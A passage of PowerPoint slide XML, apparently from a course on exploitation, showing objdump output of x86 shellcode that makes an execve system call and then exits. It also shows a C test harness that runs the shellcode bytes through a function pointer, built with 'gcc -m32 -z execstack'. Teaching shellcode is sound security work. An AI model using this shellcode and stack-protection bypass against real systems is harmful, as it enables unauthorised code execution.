                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prelim</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>08048394 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048394:       b8 0b 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0xb,%eax </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048399:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 1c 96 04 08          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x804961c,%ebx </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804839e:       6a 00                   push   $0x0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a0:       68 1c 96 04 08          push   $0x804961c </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a5:       89 e1                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a7:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x0,%edx </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483ac:       cd 80                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x80 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483ae:       b8 01 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x1,%eax </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483b3:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x0,%ebx </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483b8:       cd 80                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115223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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Testing the Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B00040"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = "\xb8\x0b\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x1c\x96"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	   			      	 "\x04\x08\x6a\x00\x68\x1c\x96\x04"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                     "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80\xb8\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                     "\x00\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  shell();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test_shellcode.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
